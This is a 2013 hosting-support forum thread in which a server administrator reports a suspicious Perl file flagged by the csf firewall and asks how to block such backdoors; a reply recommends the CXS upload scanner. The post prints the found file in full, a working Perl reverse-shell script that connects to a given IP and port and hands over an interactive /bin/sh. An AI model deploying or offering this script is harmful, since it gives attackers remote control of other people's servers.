ConfigServer Community Forum

Peer support forums for ConfigServer Scripts
https://mail.forum.configserver.com/

Block certain suspicious files

https://mail.forum.configserver.com/viewtopic.php?t=7144

Page 1 of 1

Block certain suspicious files

Posted: 05 Nov 2013, 06:17
by saurabhnsonar
I have got alert form csf regarding suspicious file bc. pl on the server with the following content.

#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
close(STDIN);
close(STDOUT);
close(STDERR);

This gives direct access to shell of the server. Can someone suggest me how can I stop such kind of backdoor connect script to work rather that checking a alert and manually deleting every time after I get just alert?
Please help with some suggestions to block such kind of hacking attacks.

Thank you!

Re: Block certain suspicious files

Posted: 06 Nov 2013, 23:51
by Sergio
Using CXS is the best way of blocking this. CXS checks every file uploaded to the server and deletes the file on the fly.

Sergio
All times are UTC
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited